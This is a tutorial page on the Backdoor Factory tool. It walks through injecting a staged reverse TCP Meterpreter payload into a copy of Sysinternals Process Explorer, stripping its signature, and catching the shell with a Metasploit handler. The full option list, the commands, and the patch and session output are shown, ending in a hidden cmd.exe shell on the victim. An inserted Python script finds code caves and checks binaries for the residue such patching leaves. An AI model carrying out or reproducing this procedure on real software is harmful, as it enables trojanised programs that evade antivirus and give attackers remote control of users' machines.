Backdoor-Factory

Description

The goal of Backdoor-Factory (BDF) is to patch executable binaries with user-supplied shellcode while preserving normal execution: once the payload has run, control returns to the original entry instructions and the program behaves exactly as it did before patching.

“Backdoor Factory” (BDF for short) patches malicious payloads into binaries in a way that is designed to evade signature-based antivirus, retains full binary functionality, and, when an existing code cave is used rather than a new section (-a), does not increase the file size by a single byte.

How is BDF different from other tools such as msfvenom? Tools like msfvenom can embed malicious code in a legitimate binary, but they do so by appending the payload to the end of the file. That both grows the backdoored binary and gives antivirus engines an obvious, consistent artifact to signature. BDF instead hides the payload inside code caves that already exist in the binary.

Code caves are a by-product of compilers and linkers: to keep sections and embedded data aligned, the linker pads the gaps with runs of 0x00 bytes, and any such run large enough to hold a payload is a code cave. BDF overwrites one of these runs (or several, chained with -J) with its shellcode. Because the payload occupies null bytes that were already in the file, the patched binary has exactly the same size as the original; what changes is the content (and therefore the hash), the patched entry instructions, and, with the default settings, the protection flags of the section that holds the cave.

Usage

Syntax

backdoor.py [options]

Options

  -h, --help            show this help message and exit
  -f FILE, --file=FILE  File to backdoor
  -s SHELL, --shell=SHELL
                        Payloads that are available for use. Use 'show' to see
                        payloads.
  -H HOST, --hostip=HOST
                        IP of the C2 for reverse connections.
  -P PORT, --port=PORT  The port to either connect back to for reverse shells
                        or to listen on for bind shells
  -J, --cave_jumping    Select this option if you want to use code cave
                        jumping to further hide your shellcode in the binary.
  -a, --add_new_section
                        Force a new section to be added to the exe (better
                        success rate) at the cost of less AV avoidance
  -U SUPPLIED_SHELLCODE, --user_shellcode=SUPPLIED_SHELLCODE
                        User supplied shellcode, make sure that it matches the
                        architecture that you are targeting.
  -c, --cave            The cave flag will find code caves that can be used
                        for stashing shellcode. This will print all the code
                        caves of at least a given size. The -l flag can be
                        used with this setting.
  -l SHELL_LEN, --shell_length=SHELL_LEN
                        For use with -c to help find code caves of different
                        sizes
  -o OUTPUT, --output-file=OUTPUT
                        The backdoor output file
  -n NSECTION, --section=NSECTION
                        New section name must be less than seven characters
  -d DIR, --directory=DIR
                        This is the location of the files that you want to
                        backdoor. You can make a directory of file backdooring
                        faster by forcing the attaching of a codecave to the
                        exe by using the -a setting.
  -w, --change_access   This flag changes the section that houses the codecave
                        to RWE. Sometimes this is necessary. Enabled by
                        default. If disabled, the backdoor may fail.
  -i, --injector        This command turns the backdoor factory into a hunt-
                        and-inject mechanism. Edit the target settings in the
                        injector module.
  -u SUFFIX, --suffix=SUFFIX
                        For use with injector, places a suffix on the original
                        file for easy recovery
  -D, --delete_original
                        For use with injector module.  This command deletes
                        the original file.  Not for use in production systems.
                        *Author not responsible for stupid uses.*
  -O DISK_OFFSET, --disk_offset=DISK_OFFSET
                        Starting point on disk offset, in bytes. Some authors
                        want to obfuscate their on disk offset to avoid
                        reverse engineering, if you find one of those files
                        use this flag, after you find the offset.
  -S, --support_check   To determine if the file is supported by BDF prior to
                        backdooring the file. For use by itself or with
                        verbose. This check happens automatically if the
                        backdooring is attempted.
  -M, --cave-miner      Future use, to help determine smallest shellcode
                        possible in a PE file
  -q, --no_banner       Kills the banner.
  -v, --verbose         For debug information output.
  -T IMAGE_TYPE, --image-type=IMAGE_TYPE
                        ALL, x86, or x64 type binaries only. Default=ALL
  -Z, --zero_cert       Allows for the overwriting of the pointer to the PE
                        certificate table effectively removing the certificate
                        from the binary for all intents and purposes.
  -R, --runas_admin     Checks the PE binaries for 'requestedExecutionLevel
                        level="highestAvailable"'. If this string is included
                        in the binary, it must run as system/admin. Doing this
                        slows patching speed significantly.
  -L, --patch_dll       Use this setting if you DON'T want to patch DLLs.
                        Patches by default.
  -F FAT_PRIORITY, --FAT_PRIORITY=FAT_PRIORITY
                        For MACH-O format. If fat file, focus on which arch to
                        patch. Default is x64. To force x86 use -F x86, to
                        force both archs use -F ALL.
  -B BEACON, --beacon=BEACON
                        For payloads that have the ability to beacon out, set
                        the time in secs
  -m PATCH_METHOD, --patch-method=PATCH_METHOD
                        Patching methods for PE files, 'manual','automatic',
                        and onionduke
  -b SUPPLIED_BINARY, --user_malware=SUPPLIED_BINARY
                        For onionduke. Provide your desired binary.
  -X, --xp_mode         Default: no support for XP legacy machines; use -X
                        to support XP. Without it the patched binary will
                        crash on XP machines (e.g. sandboxes)

Example

Backdooring Process Explorer

Download Process Explorer:

cyborg@cyborg:~/Downloads/ProcessExplorer$ ls -l
total 2528
-rw-r--r-- 1 cyborg cyborg    2028 Jun 28  2014 Eula.txt
-rw-r--r-- 1 cyborg cyborg   72154 Oct 15  2012 procexp.chm
-rwxr-xr-x 1 cyborg cyborg 2508440 Mar  9  2015 procexp.exe

Record the md5sum of procexp.exe before patching. The backdoored file will have exactly the same size as this procexp.exe (2508440 bytes), so the hash, not the size, is what confirms that the file was actually modified.

cyborg@cyborg:~/Downloads/ProcessExplorer$ md5sum procexp.exe 

d1bfe40fbca45df028029e2b5f2a62e4 procexp.exe

Copy procexp.exe to the Backdoor Factory directory:

cyborg@cyborg:~/Downloads/ProcessExplorer$ cd
cyborg@cyborg:~$ sudo cp Downloads/ProcessExplorer/procexp.exe /pentest/exploits/the-backdoor-factory-master
cyborg@cyborg:~$ cd /pentest/exploits/the-backdoor-factory-master
cyborg@cyborg:/pentest/exploits/the-backdoor-factory-master$ ls 
aPLib        COPYING      install.sh    onionduke        procexp.exe
arm          elfbin.py    intel         payloadtests.py  README.md
asm          elfbin.pyc   machobin.py   pebin.py         update.sh
backdoor.py  __init__.py  machobin.pyc  pebin.pyc        winapi

List the payloads available for this exe file:

cyborg@cyborg:/pentest/exploits/the-backdoor-factory-master$ sudo python backdoor.py  -f procexp.exe -s show
[sudo] password for cyborg: 
    ____  ____  ______           __      
   / __ )/ __ \/ ____/___ ______/ /_____  _______  __
  / __  / / / / /_  / __ `/ ___/ __/ __ \/ ___/ / / /
 / /_/ / /_/ / __/ / /_/ / /__/ /_/ /_/ / /  / /_/ /
/_____/_____/_/    \__,_/\___/\__/\____/_/   \__, /
                                            /____/

         Author:    Joshua Pitts
         Email:     the.midnite.runr[-at ]gmail<d o-t>com
         Twitter:   @midnite_runr
         IRC:       freenode.net #BDFactory
         
         Version:   3.1.3
         
[*] In the backdoor module
[*] Checking if binary is supported
[*] Gathering file info
[*] Reading win32 entry instructions
The following WinIntelPE32s are available: (use -s)
   cave_miner_inline
   iat_reverse_tcp_inline
   iat_reverse_tcp_inline_threaded
   iat_reverse_tcp_stager_threaded
   iat_user_supplied_shellcode_threaded
   meterpreter_reverse_https_threaded
   reverse_shell_tcp_inline
   reverse_tcp_stager_threaded
   user_supplied_shellcode_threaded

We will use the iat_reverse_tcp_stager_threaded payload listed above. It is a staged reverse TCP payload, so the Metasploit handler started later must use the matching staged payload, windows/meterpreter/reverse_tcp:

cyborg@cyborg:/pentest/exploits/the-backdoor-factory-master$ sudo python backdoor.py  -f procexp.exe -s iat_reverse_tcp_stager_threaded -P 4444 -H  192.168.1.8
    ____  ____  ______           __      
   / __ )/ __ \/ ____/___ ______/ /_____  _______  __
  / __  / / / / /_  / __ `/ ___/ __/ __ \/ ___/ / / /
 / /_/ / /_/ / __/ / /_/ / /__/ /_/ /_/ / /  / /_/ /
/_____/_____/_/    \__,_/\___/\__/\____/_/   \__, /
                                            /____/

         Author:    Joshua Pitts
         Email:     the.midnite.runr[-at ]gmail<d o-t>com
         Twitter:   @midnite_runr
         IRC:       freenode.net #BDFactory
         
         Version:   3.1.3
         
[*] In the backdoor module
[*] Checking if binary is supported
[*] Gathering file info
[*] Reading win32 entry instructions
[*] Loading PE in pefile
[*] Parsing data directories
[*] Looking for and setting selected shellcode
[*] Creating win32 resume execution stub
[*] Looking for caves that will fit the minimum shellcode length of 453
[*] All caves lengths:  453
############################################################
The following caves can be used to inject code and possibly
continue execution.
**Don't like what you see? Use jump, single, append, or ignore.**
############################################################
[*] Cave 1 length as int: 453
[*] Available caves: 
1. Section Name: .data; Section Begin: 0xd3c00 End: 0xdce00; Cave begin: 0xd7d2b End: 0xd7fcc; Cave Size: 673
2. Section Name: .data; Section Begin: 0xd3c00 End: 0xdce00; Cave begin: 0xda269 End: 0xda444; Cave Size: 475
3. Section Name: .data; Section Begin: 0xd3c00 End: 0xdce00; Cave begin: 0xda497 End: 0xda688; Cave Size: 497
4. Section Name: .data; Section Begin: 0xd3c00 End: 0xdce00; Cave begin: 0xda6ef End: 0xda8cc; Cave Size: 477
5. Section Name: .data; Section Begin: 0xd3c00 End: 0xdce00; Cave begin: 0xdadc1 End: 0xdaf98; Cave Size: 471
6. Section Name: .data; Section Begin: 0xd3c00 End: 0xdce00; Cave begin: 0xdb32d End: 0xdb55c; Cave Size: 559
7. Section Name: None; Section Begin: None End: None; Cave begin: 0xdcc0b End: 0xdce04; Cave Size: 505
8. Section Name: .rsrc; Section Begin: 0xdce00 End: 0x257200; Cave begin: 0x1ecde5 End: 0x1ed168; Cave Size: 899
9. Section Name: .rsrc; Section Begin: 0xdce00 End: 0x257200; Cave begin: 0x1efc5d End: 0x1efe38; Cave Size: 475
10. Section Name: .rsrc; Section Begin: 0xdce00 End: 0x257200; Cave begin: 0x1efe8f End: 0x1f0080; Cave Size: 497
11. Section Name: .rsrc; Section Begin: 0xdce00 End: 0x257200; Cave begin: 0x1f00eb End: 0x1f02c8; Cave Size: 477
12. Section Name: .rsrc; Section Begin: 0xdce00 End: 0x257200; Cave begin: 0x1f07c9 End: 0x1f09a0; Cave Size: 471
13. Section Name: .rsrc; Section Begin: 0xdce00 End: 0x257200; Cave begin: 0x1f0d6d End: 0x1f10a8; Cave Size: 827
14. Section Name: .rsrc; Section Begin: 0xdce00 End: 0x257200; Cave begin: 0x20165f End: 0x20183c; Cave Size: 477
15. Section Name: .rsrc; Section Begin: 0xdce00 End: 0x257200; Cave begin: 0x20205a End: 0x20224a; Cave Size: 496
16. Section Name: .rsrc; Section Begin: 0xdce00 End: 0x257200; Cave begin: 0x20265c End: 0x20283c; Cave Size: 480
17. Section Name: .rsrc; Section Begin: 0xdce00 End: 0x257200; Cave begin: 0x2060d7 End: 0x2062ab; Cave Size: 468
18. Section Name: .rsrc; Section Begin: 0xdce00 End: 0x257200; Cave begin: 0x20b1c4 End: 0x20b45c; Cave Size: 664
19. Section Name: .rsrc; Section Begin: 0xdce00 End: 0x257200; Cave begin: 0x20d5e3 End: 0x20d85c; Cave Size: 633
20. Section Name: .rsrc; Section Begin: 0xdce00 End: 0x257200; Cave begin: 0x20dfa3 End: 0x20e180; Cave Size: 477
21. Section Name: .rsrc; Section Begin: 0xdce00 End: 0x257200; Cave begin: 0x20e47b End: 0x20e7cc; Cave Size: 849
22. Section Name: .rsrc; Section Begin: 0xdce00 End: 0x257200; Cave begin: 0x20e923 End: 0x20ef53; Cave Size: 1584
23. Section Name: .rsrc; Section Begin: 0xdce00 End: 0x257200; Cave begin: 0x2105bc End: 0x210d34; Cave Size: 1912
24. Section Name: .rsrc; Section Begin: 0xdce00 End: 0x257200; Cave begin: 0x210ecb End: 0x2110ef; Cave Size: 548
25. Section Name: .rsrc; Section Begin: 0xdce00 End: 0x257200; Cave begin: 0x211be4 End: 0x211edc; Cave Size: 760
26. Section Name: .rsrc; Section Begin: 0xdce00 End: 0x257200; Cave begin: 0x2126ac End: 0x212884; Cave Size: 472
27. Section Name: .rsrc; Section Begin: 0xdce00 End: 0x257200; Cave begin: 0x230c3b End: 0x230e0f; Cave Size: 468
28. Section Name: .rsrc; Section Begin: 0xdce00 End: 0x257200; Cave begin: 0x235d28 End: 0x235fc0; Cave Size: 664
29. Section Name: .rsrc; Section Begin: 0xdce00 End: 0x257200; Cave begin: 0x238147 End: 0x2383c0; Cave Size: 633
30. Section Name: .rsrc; Section Begin: 0xdce00 End: 0x257200; Cave begin: 0x238b07 End: 0x238ce4; Cave Size: 477
31. Section Name: .rsrc; Section Begin: 0xdce00 End: 0x257200; Cave begin: 0x238fdf End: 0x239330; Cave Size: 849
32. Section Name: .rsrc; Section Begin: 0xdce00 End: 0x257200; Cave begin: 0x239487 End: 0x239ab7; Cave Size: 1584
33. Section Name: .rsrc; Section Begin: 0xdce00 End: 0x257200; Cave begin: 0x23b120 End: 0x23b898; Cave Size: 1912
34. Section Name: .rsrc; Section Begin: 0xdce00 End: 0x257200; Cave begin: 0x23ba2f End: 0x23bc53; Cave Size: 548
35. Section Name: .rsrc; Section Begin: 0xdce00 End: 0x257200; Cave begin: 0x23c748 End: 0x23ca40; Cave Size: 760
36. Section Name: .rsrc; Section Begin: 0xdce00 End: 0x257200; Cave begin: 0x23d210 End: 0x23d3e8; Cave Size: 472
**************************************************
[!] Enter your selection: 5
[!] Using selection: 5
[*] Changing flags for section: .data
[*] Patching initial entry instructions
[*] Creating win32 resume execution stub
[*] Looking for and setting selected shellcode
[*] Overwriting certificate table pointer
File procexp.exe is in the 'backdoored' directory

Set the host (-H) and port (-P) to your listener's address and port. The selection prompt lists every cave at least as large as the payload (453 bytes here); cave 5, a 471-byte run in .data, was chosen. Note what BDF logs after the selection: it changed the flags of .data so the cave is executable (the -w default, which leaves the section RWE), and it overwrote the certificate table pointer, so the patched file no longer carries a valid Authenticode signature. Both are artifacts a defender can check for on disk. The patched file is written to the “backdoored” directory:
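The following script is an added example for this page, not Backdoor Factory's own code. It ties together the code-cave description in the Description section and the patch log above: find_caves() enumerates runs of 0x00 bytes the way BDF's -c/-l listing does (section name, begin, end, size, with None for a run outside every section), simulate_patch() reproduces only the file-level side effects seen in the log (payload written into a cave, the cave's section flipped to RWE, certificate table pointer zeroed) without the entry-point hook, and audit_patch() is the defender's check for those two artifacts. build_sample_pe() fabricates a minimal, non-loadable PE32 as constructed input so the script runs offline; nothing here reads procexp.exe, and all function names and the sample layout are this example's own.

```python
import hashlib
import re
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000
IMAGE_DIRECTORY_ENTRY_SECURITY = 4      # data-directory slot of the certificate table


def parse_pe(data):
    """Parse just enough of a PE image to locate its sections and certificate table."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ header")
    pe = struct.unpack_from("<I", data, 0x3C)[0]                   # e_lfanew
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    coff = pe + 4
    nsect = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    # Data directories start 96 bytes into a PE32 optional header, 112 for PE32+.
    dd = opt + (96 if magic == 0x10B else 112) + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY
    cert_dir_off = dd if dd + 8 <= opt + opt_size else None
    cert_dir = struct.unpack_from("<II", data, dd) if cert_dir_off else None
    sections = []
    for i in range(nsect):
        hdr = opt + opt_size + 40 * i                                # IMAGE_SECTION_HEADER
        name, _vsize, _va, raw_size, raw_off, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", data, hdr)
        sections.append({"name": name.rstrip(b"\0").decode(), "hdr": hdr,
                         "raw_off": raw_off, "raw_size": raw_size, "chars": chars})
    return {"sections": sections, "cert_dir": cert_dir, "cert_dir_off": cert_dir_off}


def find_caves(data, min_len):
    """(section, begin, end, size) for every run of at least min_len 0x00 bytes,
    the fields BDF prints; a run starting outside every section gets None."""
    sections = parse_pe(data)["sections"]
    caves = []
    for m in re.finditer(b"\x00{%d,}" % min_len, data):
        owner = next((s["name"] for s in sections
                      if s["raw_off"] <= m.start() < s["raw_off"] + s["raw_size"]), None)
        caves.append((owner, m.start(), m.end(), m.end() - m.start()))
    return caves


def audit_patch(data):
    """Defender-side checks: writable+executable sections, and whether the
    certificate table is still referenced (BDF zeroes that pointer)."""
    info = parse_pe(data)
    rwe = [s["name"] for s in info["sections"]
           if s["chars"] & IMAGE_SCN_MEM_WRITE and s["chars"] & IMAGE_SCN_MEM_EXECUTE]
    cd = info["cert_dir"]
    return {"rwe_sections": rwe, "cert_table_present": bool(cd and cd[0] and cd[1])}


def simulate_patch(data, shellcode):
    """File-level effects of the BDF run above: payload into the first in-section
    cave that fits, that section marked RWE (-w default), certificate-table
    pointer zeroed. No entry-point hook or resume stub: not a working backdoor."""
    buf = bytearray(data)
    info = parse_pe(data)
    owner, begin, _end, _size = next(c for c in find_caves(data, len(shellcode)) if c[0])
    buf[begin:begin + len(shellcode)] = shellcode
    sec = next(s for s in info["sections"] if s["name"] == owner)
    struct.pack_into("<I", buf, sec["hdr"] + 36,                     # Characteristics field
                     sec["chars"] | IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_EXECUTE)
    if info["cert_dir_off"]:
        struct.pack_into("<II", buf, info["cert_dir_off"], 0, 0)
    return bytes(buf)


def build_sample_pe():
    """Constructed test input (not a loadable program): minimal PE32 with .text,
    a .data section holding a 600-byte zero run, and a 16-byte stand-in
    certificate blob referenced from the Security directory."""
    text = b"\xc3" * 0x100 + b"\x00" * 0x100                        # code plus alignment padding
    data = b"A" * 0x80 + b"\x00" * 600 + b"B" * 0x80
    data += b"\x00" * (-len(data) % 0x200)                            # pad to 512-byte file alignment
    hdr_size = 0x200
    cert = b"\xde\xad\xbe\xef" * 4
    cert_off = hdr_size + len(text) + len(data)
    secs = [(b".text", hdr_size, len(text), 0x60000020),               # CODE|EXECUTE|READ
            (b".data", hdr_size + len(text), len(data), 0xC0000040)]   # INITIALIZED_DATA|READ|WRITE
    hdr = bytearray(hdr_size)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)                           # e_lfanew
    hdr[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<HHIIIHH", hdr, 0x44, 0x14C, len(secs), 0, 0, 0, 224, 0x102)
    opt = 0x58
    struct.pack_into("<H", hdr, opt, 0x10B)                           # PE32 magic
    struct.pack_into("<II", hdr, opt + 96 + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY,
                     cert_off, len(cert))
    for i, (name, off, size, chars) in enumerate(secs):
        struct.pack_into("<8sIIIIIIHHI", hdr, opt + 224 + 40 * i,
                         name, size, 0x1000 * (i + 1), size, off, 0, 0, 0, 0, chars)
    return bytes(hdr) + text + data + cert


if __name__ == "__main__":
    original = build_sample_pe()
    for cave in find_caves(original, 453):                            # 453 = BDF's minimum in the log above
        print("cave in %s: 0x%x-0x%x, %d bytes" % cave)
    patched = simulate_patch(original, b"\xcc" * 453)
    for label, blob in (("original", original), ("patched", patched)):
        print(label, len(blob), hashlib.md5(blob).hexdigest(), audit_patch(blob))
```

Run it as-is and it prints one 600-byte cave in .data, then shows that the patched copy keeps the original size while its MD5 changes, its .data section becomes RWE and its certificate table disappears. Point find_caves() and audit_patch() at a real PE (open(path, "rb").read()) to check a suspect binary; an RWE data or resource section, or a Sysinternals-style binary with no certificate table, is exactly the residue the walkthrough's log describes.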

cyborg@cyborg:/pentest/exploits/the-backdoor-factory-master$ ls
aPLib       backdoor.py  __init__.py  machobin.pyc     pebin.pyc    winapi
arm         COPYING      install.sh   onionduke        procexp.exe
asm         elfbin.py    intel        payloadtests.py  README.md
backdoored  elfbin.pyc   machobin.py  pebin.py         update.sh
cyborg@cyborg:/pentest/exploits/the-backdoor-factory-master$ cd backdoored/

Check the file and its size:

cyborg@cyborg:/pentest/exploits/the-backdoor-factory-master/backdoored$ ls -l
total 2452
-rwxrwxrwx 1 root root 2508440 Oct 12 12:36 procexp.exe

The size is exactly the same as that of the non-backdoored file. Now check its md5sum:

cyborg@cyborg:/pentest/exploits/the-backdoor-factory-master/backdoored$ md5sum procexp.exe 
fbf9d5a97ce36f965f0dde157bbc7282  procexp.exe

The md5sum differs from the original, which confirms the file was modified. Now start Metasploit and a handler for the reverse connection; the handler payload must match the staged payload that was patched in, windows/meterpreter/reverse_tcp:

cyborg@cyborg:/pentest/exploits/the-backdoor-factory-master/backdoored$ cd
cyborg@cyborg:~$ sudo msfpro
[*] Starting Metasploit Console...

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%     %%%         %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%  %%  %%%%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%  %  %%%%%%%%   %%%%%%%%%%% http://metasploit.pro %%%%%%%%%%%%%%%%%%%%%%%%%
%%  %%  %%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%  %%%%%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%  %%%  %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%    %%   %%%%%%%%%%%  %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%  %%%  %%%%%
%%%%  %%  %%  %      %%      %%    %%%%%      %    %%%%  %%   %%%%%%       %%
%%%%  %%  %%  %  %%% %%%%  %%%%  %%  %%%%  %%%%  %% %%  %% %%% %%  %%%  %%%%%
%%%%  %%%%%%  %%   %%%%%%   %%%%  %%%  %%%%  %%    %%  %%% %%% %%   %%  %%%%%
%%%%%%%%%%%% %%%%     %%%%%    %%  %%   %    %%  %%%%  %%%%   %%%   %%%     %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%  %%%%%%% %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%          %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%


Love leveraging credentials? Check out bruteforcing
in Metasploit Pro -- learn more on http://rapid7.com/metasploit

       =[ metasploit v4.10.0-2014082003 [core:4.10.0.pre.2014082003 api:1.0.0]]
+ -- --=[ 1339 exploits - 809 auxiliary - 228 post        ]
+ -- --=[ 340 payloads - 35 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

[*] Successfully loaded plugin: pro


msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.8
LHOST => 192.168.1.8
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > run

[*] Started reverse handler on 192.168.1.8:4444 
[*] Starting the payload handler...
[*] Sending stage (769536 bytes) to 192.168.1.40
[*] Meterpreter session 1 opened (192.168.1.8:4444 -> 192.168.1.40:51775) at 2015-10-12 12:57:58 +0530


meterpreter > pwd
C:\Users\ztrela\Downloads
meterpreter > execute -f cmd.exe -i -H
Process 2148 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\ztrela\Downloads>

©2017 Ztrela Knowledge Solutions Pvt. Ltd
